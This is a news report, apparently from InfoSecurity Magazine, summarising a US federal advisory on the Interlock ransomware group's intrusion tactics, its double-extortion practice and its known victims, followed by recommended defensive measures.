US Warns of Widespread Interlock Cyberattacks
▼ Summary
– The US government has warned businesses and critical infrastructure to be vigilant against attacks by the Interlock ransomware gang, which uses novel initial access techniques.
– Interlock employs “drive-by-download” and ClickFix social engineering tactics to infiltrate systems, targeting organizations in North America and Europe.
– The group uses double extortion, exfiltrating and encrypting data to pressure victims into paying ransoms, and deploys ransomware for both Windows and Linux systems.
– Post-compromise, Interlock affiliates use tools like PowerShell scripts, credential stealers, and RDP for lateral movement, exfiltrating data via legitimate tools like AzCopy.
– The advisory recommends defensive measures against Interlock’s tactics, noting the group threatens to leak stolen data unless ransoms are paid in Bitcoin.
The US government has issued an urgent warning about escalating cyber threats from the Interlock ransomware group, urging businesses and critical infrastructure operators to strengthen their defenses. Federal agencies including the FBI and Department of Health and Human Services revealed the group’s sophisticated tactics, which have already compromised healthcare systems and local governments across North America and Europe.
Interlock’s operations stand out due to their unconventional infiltration methods, particularly a drive-by-download technique that automatically infects devices when users visit compromised websites. Unlike typical ransomware groups, they also employ ClickFix social engineering, tricking victims into executing malicious scripts disguised as error messages. Once inside a network, attackers deploy credential stealers, keyloggers, and remote desktop tools to move laterally before encrypting files and demanding payment.
Double extortion remains their signature strategy, stealing sensitive data before locking systems, then threatening to leak information unless ransoms are paid in Bitcoin. Recent high-profile victims include Kettering Health in Ohio and West Lothian Council in Scotland, demonstrating the group’s ability to disrupt essential services.
To counter these threats, authorities recommend immediate defensive measures:
- Disabling unnecessary scripting (like PowerShell) where possible
- Enforcing multi-factor authentication to block credential theft
- Segmenting networks to limit lateral movement
- Monitoring for unusual file transfers, especially via tools like AzCopy or WinSCP
Interlock’s ransom notes omit payment details initially, instead directing victims to a Tor-based portal where negotiations occur. The group has followed through on threats to publish stolen data, making proactive security upgrades critical. With attacks growing bolder, organizations must prioritize real-time threat detection and employee training to recognize social engineering ploys.
Federal agencies emphasize that paying ransoms does not guarantee data recovery and may fuel further attacks. Instead, businesses should maintain offline backups, patch vulnerabilities promptly, and report incidents to law enforcement to disrupt the ransomware ecosystem. As cybercriminals refine their tactics, a layered defense strategy remains the most effective safeguard against escalating threats.
(Source: InfoSecurity Magazine)